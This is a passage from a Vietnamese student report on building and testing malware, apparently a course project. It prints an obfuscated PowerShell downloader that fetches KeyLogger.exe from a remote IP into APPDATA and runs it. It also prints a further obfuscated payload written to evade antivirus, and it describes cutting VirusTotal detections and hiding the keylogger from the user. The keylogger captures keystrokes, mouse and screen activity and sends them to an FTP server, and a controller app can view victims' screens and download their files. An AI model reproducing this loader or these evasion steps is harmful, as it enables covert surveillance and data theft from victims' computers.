("{0}{1}{4}{3}{2}"-f'Sys','t','ent','ebCli','em.Net.W')).("{2}{0}{3}{1}"-f
'wnloa','File','Do','d').Invoke(("{8}{3}{2}{5}{4}{6}{0}{7}{1}"- f'gger.e','e','0','1','9','3.6','.193.23/KeyLo','x','http://'),("$env:APPDATA\Active"+ ('Windows'+'hAdActiv'+'e'+'.'+'e'+'xe').("{0}{1}"-f'rEplAc','e').Invoke('hAd','\'))). ("{2}{0}{1}{3}"-f'rt','-','Sta','Process') (("$env:APPDATA\Active"+ (('Window'+'s3Q'+'l'+'Acti'+'ve.exe')-replACe '3Ql',[ChAr]92)))
Hình 16.Mã độc được lưu tại server
Sau khi thêm đoạn mã độc trên vào phần mềm vào kiểm tra lại với trang Virustotal thì có kết quả như sau:
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Hình 17 Kết quả Virustotal kiểm tra sau khi thêm mã độc vào phần mềm
Kết quả cho thấy các phần mềm Antivirus phổ biến vẫn có khả năng phát hiện phần mềm độc hại của chúng tôi, chủ yếu do đoạn mã độc mới được thêm vào Để giảm thiểu tỷ lệ phát hiện trên trang Virustotal, nhóm sẽ áp dụng kỹ thuật Obfuscation đã đề cập trước đó nhằm vượt qua các chương trình Antivirus.
Sau khi áp dụng kỹ thuật Obfuscation, chúng ta sẽ tiến hành xem xét lại mã độc và kiểm tra kết quả quét cuối cùng trên trang virustotal.
(-jOIN [System.Text.RegularExpressions.Regex]::MatChES(\" ) )
93]RAHC[,)18]RAHC[+65]RAHC[+011]RAHC[(ecaLpErC - 43]RAHC[, 'sna' ecaLpErC -
421]RAHC[,)76]RAHC[+67]RAHC[+301]RAHC[(ecaLpErC -)')Q8' +
'nQ8nnIOJ-]2,11,3[eMan.)Q8n*rDM*Q8n Vg(( CLg )63]rAHC[,)47]' +
'rAHC[+75]rAHC[+79]rAHC[( eCAlpERC- 93]rAHC[,Q8ntvmQ8n eCaLPEr-421]rAHC[,)18]' + 'rAHC[+87]rAHC[+101]rAHC[(eCAlpE' + 'RC- ))Q8n1 , 3Q8n,Q8n, 361,
55, 721,541,611 ,05,04, 15, 74 ,0t' + 'vm+tvm71Q8n,Q8ndILlEhSJ9a+]1[dilLehsJ9a (.' + ' QNe )63]RaHc[]GNIRTs[,tvmskrtvm(ECalPeR.)93]RaHc[]GNIRTs[,)08]RaHc[' +
141,5tvm+tvm01,261 , 65,' + '15, 04tvm+tvm, 15,151, 15tvm+tvm1 ,
30tvm+tvm1,3tvm+tvm61 Q8n,Q8n ,16 ,Q8n,Q8n1 ,301, 16 ,351 ,361 , 66 , 07,7' + '5, 41tvm+tvm1' + ' , 261 , 301,621, 071,301 , 621 , 321 ,101 , 061, 611, 231 ,
121,56,141 , 3Q8n,Q8n' + '51 , 421 , 1tvm+tvm6 ,461,16tvm+tvm1Q8n,Q8n, 211' + ',601,tvm+tvQ8n,Q8n , 441 , 751 , 5' + '51' + ',Q8n,' + 'Q' + '8n011 ,711 ,421 ,661 ,
'n,451 ,521 ,551 , 101 ,0tvm+tvm61, 441 ,651 ,07 , 131, 451 , 061,341,071,75, 221,5' + '01 ,501tvm+tvm,761, 511,361 ' + ', 421 , 201, 011 ,231 , 031 ,74 ,05 ,701 ,6' + '51 , 151,221 , 461' + ',tvm+tvm tvm+tvm361 ,46 ,66 , 501, 321,
141,201,5tvmQ8n,Q8n)tvm+tvm8, ))(GnIr' + 'tSOt._skr ((61tNIoQ8' + 'n,Q8n1,761 ' + ',
75 , 521, 0Q8n,Q8n, 071 , 501 ,461,tvm+tvm 331 ,04,45,Q8n,Q8n51 ,751 , 341 Q8n,Q8n , 541, Q8n,Q8n, 651tvm+tvm,541 ,' + '65 ,461Q8n,Q8nvm+tvm461 , 221 , 20' + '1, 16 ,
'+tvm321,tvm+tvm 601 , Q8n,Q8n)tQ8n,Q8n+tvm11 , 751 ,261,601 ,27,27 , 531,
46 ,031,301,701tvm+tvm, 3' + '5 , Q8' + 'n,Q8nvm+tvm551tvm+tvm ,101, 501 ,261 ,Q8n,Q8n321 , 411,1tvm+tvm7,521 , 011,311 , 121 ,741 , 06 ,461,26,321 , 75,Q8' + 'n,Q8n 221 , 021, 551 ,711, Q8n,Q8n51 , 65 , 551, 501 , 461 , 321tvm+tvm ,
1tvm+tvm31,361 , 331,45 , 04,15 , 74 ,031, 751,661 , 421, 411, 26 , 551, 651,141,461 , 511' + ',521 , 651 ,tvm+tvm 451,13t' + 'vm+tvm1 ,321,611, 711 , 171 , 66 ,
'oBrevskr]gnIRtS[( ' + '( ZdG )} )]RAHC[ Sa-Q8n,Q8n6tvm+tvm, 611Q8n,Q8nvm' +
'Q8n,Q8nHc[+77]RaHc[((ECalPeR.)421]RaHc[]GNIRTs[,)0' +
'9]RaHc[+001]RaHc[+17]RaHc[((ECalPeR.)tvm)P2MP2MNIoj-P2MXPQ8n,Q8n 151 ,
,tvm+tvm 031,1' + '0Q8n,Q8n111, ' + '4tvm+tvm6,441,251Q8nf- sna}13{}61{}66{}01{}36{}22{}93{}55{}81{}4{}43{}73{}96{}05{}8{}53{}3{}3 7{}62{}24{}52{}11{}51{}94{}33{}7{}72{}21{}92{}06{}64{}45{}2{}14{}75{}1 7{}07{}26{}84{}56{}0{}65{}32{}47{}41{}25{}23{}6{}' + '34{}91{}15{}1{}8' + '3{}12{}42{' +
Hình 18 Mã độc đính kèm trên phần mềm đã dùng kỹ thuật Obfuscation
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Hình 19 Kết quả Virustotal khi thực hiện kỹ thuật Obfuscation
Triển khai mã độc
Sau khi tiêm thành công mã độc vào hệ thống và vượt qua phần mềm Antivirus, mã độc sẽ được kích hoạt, cho phép chúng ta giám sát máy tính của nạn nhân Đặc biệt, mã độc này sẽ được ẩn đi, khiến người dùng khó phát hiện sự hiện diện của nó.
Hình 20: Mã độc được ẩn giấu trong máy nạn nhân
Khi mã độc được kích hoạt, nó hoạt động như một "keylogger", giám sát mọi hoạt động trên bàn phím, chuột và màn hình của nạn nhân.
Trang 24 nhân Sau đó gửi những dữ liệu này qua một FTP server và được lưu theo một cấu trúc thư mục nhất định.
Hình 21: FTP chứa dữ liệu giám sát máy tính nạn nhân
Ngoài việc kết nối với một ứng dụng qua mạng, mã độc còn được cấu hình để hoạt động và theo dõi hiệu suất của nó Ứng dụng này giúp giám sát sự tồn tại và hoạt động của các mã độc.
Hình 22: Ứng dụng điều khiển mã độc
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
Hình 23: Các cấu hình cho mã độc
Một số chức năng giúp kẻ tấn công có thể theo dỏi người dùng ngay trên chính ứng dụng điều khiển mã độc.
Theo dõi màn hình của mục tiêu Có thể theo dõi màn hình của các mục tiêu các thay đổi trên màn hình mục tiêu.
Theo dõi hệ thống tập tin của mục tiêu cho phép người dùng xem cấu trúc thư mục và thông tin chi tiết về các tập tin trên máy tính mục tiêu, đồng thời có khả năng tải chúng về.
Hình 24: Theo dõi màn hình mục tiêu
Hình 25: Theo dõi hệ thống tập tin của mục tiêu
BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC
